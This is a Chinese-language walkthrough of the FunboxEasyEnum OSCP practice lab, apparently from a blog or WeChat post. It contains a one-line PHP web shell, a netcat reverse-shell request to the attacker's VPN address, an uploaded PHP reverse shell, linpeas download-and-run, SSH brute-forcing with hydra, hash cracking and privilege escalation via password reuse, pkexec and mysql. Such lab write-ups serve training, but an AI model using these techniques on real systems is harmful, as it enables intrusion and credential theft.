OSCP官方靶场-FunboxEasyEnum WP

关注泷羽Sec和泷羽Sec-静安公众号，这里会定期更新与 OSCP、渗透测试等相关的最新文章，帮助你理解网络安全领域的最新动态。后台回复“OSCP配套工具”获取本文的工具

官方网页打开或下载靶场文件

https://www.vulnhub.com/entry/funbox-easyenum,565/

快速连接OffSec靶场的小方法

信息收集

# 靶机地址
192.168.151.132
# Kali攻击机在VPN中的地址
192.168.45.156

测试靶场网络连接速度

ping 192.168.151.132 -c 10 | grep rtt

使用【踩坑总结】丝滑连接OffSec官方VPN的方法中的方法测试最佳MTU值并自动设置。

扫描端口

ports=$(sudo nmap -p- --min-rate=5000 -Pn 192.168.151.132 | grep '^[0-9]' | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//)
echo $ports
sudo nmap -sT -sC -sV -O -Pn -p$ports 192.168.151.132
sudo nmap --script=vuln -p$ports -Pn 192.168.151.132

扫描结果如下：

┌──(kali㉿kali)-[~/Desktop]
└─$ sudo nmap -sT -sC -sV -O -Pn -p$ports 192.168.151.132
Starting Nmap 7.95 ( https://nmap.org ) at 2025-07-16 03:48 EDT
Nmap scan report for bogon (192.168.151.132)
Host is up (0.096s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 9c:52:32:5b:8b:f6:38:c7:7f:a1:b7:04:85:49:54:f3 (RSA)
|   256 d6:13:56:06:15:36:24:ad:65:5e:7a:a1:8c:e5:64:f4 (ECDSA)
|_  256 1b:a9:f3:5a:d0:51:83:18:3a:23:dd:c4:a9:be:59:f0 (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-title: Apache2 Ubuntu Default Page: It works
|_http-server-header: Apache/2.4.29 (Ubuntu)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.19, Linux 5.0 - 5.14
Network Distance: 4 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 15.81 seconds

┌──(kali㉿kali)-[~/Desktop]
└─$ sudo nmap --script=vuln -p$ports -Pn 192.168.151.132
Starting Nmap 7.95 ( https://nmap.org ) at 2025-07-16 03:53 EDT
Nmap scan report for bogon (192.168.151.132)
Host is up (0.11s latency).

PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-csrf: Couldn't find any CSRF vulnerabilities.
| http-slowloris-check: 
|   VULNERABLE:
|   Slowloris DOS attack
|     State: LIKELY VULNERABLE
|     IDs:  CVE:CVE-2007-6750
|       Slowloris tries to keep many connections to the target web server open and hold
|       them open as long as possible.  It accomplishes this by opening connections to
|       the target web server and sending a partial request. By doing so, it starves
|       the http server's resources causing Denial Of Service.
|       
|     Disclosure date: 2009-09-17
|     References:
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
|_      http://ha.ckers.org/slowloris/
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
| http-enum: 
|   /robots.txt: Robots file
|_  /phpmyadmin/: phpMyAdmin

打开80端口如图，是一个Apache2默认配置页面，如果说管理员没有配置网站访问权限的话，应该还能使用目录扫描发现其他默认目录。

扫描目录

字典目录地址如下，一般选择Medium字典即可。

cd /usr/share/wordlists/dirbuster
ls

sudo gobuster dir \
  -u http://192.168.151.132/ \                  # 目标 URL
  --wordlist=/usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt \  # 使用中等规模字典
  -e \              # 显示完整 URL
  -t 20 \           # 20 线程加速扫描
  -x php            # 额外探测 .php 文件

发现存在新的页面：

http://192.168.151.132/mini.php

反弹Shell

这个靶机是个奖励关，是一个文件上传的练手靶机。现实情况中，基本没有这么傻的服务器。练手也要好好练习，这是一个典型的PHP文件上传还能反弹PHP代码的靶机，我们可以用这个靶机练习多种反弹Shell的方式。

方法一：修改Mini.php，注入反弹

选择Mini.php的选项，选择 Edit 编辑，点击执行按钮。

可以修改Mini.php文件的内容，额外的发现是option&path=/var/www/html似乎可以用于遍历目录，但是访问其他目录没有列出文件，似乎是没有权限。

还是回到原来的思路，修改php文件，加入一句话木马。

<?=`$_GET[0]`?>

这里可以发现第一个flag了。网页形式的命令实在是不好操作，把 Mini.php改一个反弹的命令。初次尝试用下面的命令，弹回了，但是无法有交互的终端，如果带上-e或者-c /bin/bash参数的话，就无法弹回来了。

http://192.168.151.132/mini.php?0=nc%20192.168.45.156%204777

方法二：上传反弹php文件，访问反弹

查找PHP反弹shell的脚本

find / -name 'php-reverse*' 2>/dev/null 
---
┌──(kali㉿kali)-[~/Desktop]
└─$ find / -name 'php-reverse*' 2>/dev/null 
/usr/share/laudanum/php/php-reverse-shell.php
/usr/share/laudanum/wordpress/templates/php-reverse-shell.php

复制到本地，修改然后再网页中上传。

可以发现权限是只读的，该做全员可读可写可执行。

访问此链接，反弹成功。

提权Root

从一开始的目录扫描和Nmap的结果中我们还漏了一个phpmyadmin的数据库页面，打开发现确实是存在。但是密码不是默认密码。

内网信息收集

继续从建立的Shell探索。在/tmp目录下载linpeas.sh脚本，来查找系统下有什么可疑文件可以利用。

cd /tmp
wget https://github.com/peass-ng/PEASS-ng/releases/download/20250701-bdcab634/linpeas.sh
chmod +x linpeas.sh
./linpeas.sh

找到个3306端口开放，应该是phpmyadmin的数据库端口。53作为DNS的服务器。

Pkexec似乎可以用作提权。

密码文件里，这个似乎可以爆下哈希。

oracle:$1$|O@GOeN\$PGb9VNu29e9s6dMNJKH/R0:1004:1004:,,,:/home/oracle:/bin/bash

Karla用户似乎是管理员角色的账户，他的权限比其他人高，仅次于root。

发现数据库的配置文件。

其他有趣的文件，后来看了不知道是干什么的。

数据库密码也找到了。

╔══════════╣ Readable files belonging to root and readable by me but not world readable
-rw-r----- 1 root www-data 525 Sep 18  2020 /etc/phpmyadmin/config-db.php
-rw-r----- 1 root www-data 8 Sep 18  2020 /etc/phpmyadmin/htpasswd.setup
-rw-r----- 1 root www-data 68 Sep 18  2020 /var/lib/phpmyadmin/blowfish_secret.inc.php
-rw-r----- 1 root www-data 0 Sep 18  2020 /var/lib/phpmyadmin/config.inc.php
╔══════════╣ Searching passwords in config PHP files
/etc/phpmyadmin/config-db.php:$dbpass='tgbzhnujm!';
/etc/phpmyadmin/config-db.php:$dbuser='phpmyadmin';
/etc/phpmyadmin/config.inc.php:    // $cfg['Servers'][$i]['AllowNoPassword'] = TRUE;
/etc/phpmyadmin/config.inc.php:// $cfg['Servers'][$i]['AllowNoPassword'] = TRUE;
/usr/share/phpmyadmin/config.sample.inc.php:$cfg['Servers'][$i]['AllowNoPassword'] = false;
/usr/share/phpmyadmin/libraries/config.default.php:$cfg['Servers'][$i]['AllowNoPassword'] = false;
/usr/share/phpmyadmin/libraries/config.default.php:$cfg['Servers'][$i]['nopassword'] = false;
/usr/share/phpmyadmin/libraries/config.default.php:$cfg['ShowChgPassword'] = true;

╔══════════╣ Modified interesting files in the last 5mins (limit 100)
/var/log/auth.log
/var/log/journal/7eb907a1e82c4e37b03c20faa67cf884/system.journal
/var/log/syslog

使用小豌豆找到的密码，尝试登录phpmyadmin后台成功。所以凭证就是

phpmyadmin
tgbzhnujm!

方法一：进入Karla sudo su快捷提权（瞎蒙）

从前面收集的信息来看，Karla推测是管理员的角色，而管理员一般就是维护数据库的人，极有可能重复使用同一个密码。尝试切换到Karla账户，输入数据库的密码蒙一下：tgbzhnujm!成功进入。

Karla确实是管理员角色，sudo -l发现它可以执行所有命令，所以直接sudo su就能进root了。

方法二：进入Karla用Pkexec提权

内网信息收集中的Pkexec似乎可以用作提权，查询https://gtfobins.github.io/gtfobins/pkexec/提权命令即可。www-data账户不可提权，因为不知道www-data的密码。karla账户可以，Oracle账户不行。

方法三：爆破Goat，用Mysql提权

内网信息手机中发现，Goat账户是可以SSH登录的，而官网题目也提示了goat。所以，直接尝试用hydra爆破一下ssh登录。

hydra -l goat -P /usr/share/wordlists/rockyou.txt ssh://192.168.151.132
ssh goat@192.168.151.132
密码也是goat

也可以不用爆，题目已经给了提示。

登录后发现mysql命令可以无密码提权，搜索https://gtfobins.github.io/gtfobins/mysql/命令输入即可提权。

其他玩法

Oracle账户

之前发现有Oracle账户的哈希，尝试爆破。

cat > orcalhash        
# 粘贴下面的内容，按 Ctrl D结束
oracle:$1$|O@GOeN\$PGb9VNu29e9s6dMNJKH/R0:1004:1004:,,,:/home/oracle:/bin/bash

cd /usr/share/wordlists  
sudo gzip -d rockyou.txt.gz

 hashcat orcalhash /usr/share/wordlists/rockyou.txt

爆破密码得到是hiphop

可以直接从www-data账户直接su oracle进入账户，但是好像没啥有用的。

Harry账户

在Karla账户或root账户下执行sudo mysql进入数据库。

show databases;
use db1
show tables;
select * from users;

解码一下得到密码是123456

但是好像也没啥用。

遗憾：没找到Sllay的密码。

🔔 想要获取更多网络安全与编程技术干货？

关注 泷羽Sec-静安 公众号，与你一起探索前沿技术，分享实用的学习资源与工具。我们专注于深入分析，拒绝浮躁，只做最实用的技术分享！💻

扫描下方二维码，马上加入我们，共同成长！🌟

👉 长按或扫描二维码关注公众号

或者直接回复文章中的关键词，获取更多技术资料与书单推荐！📚

静静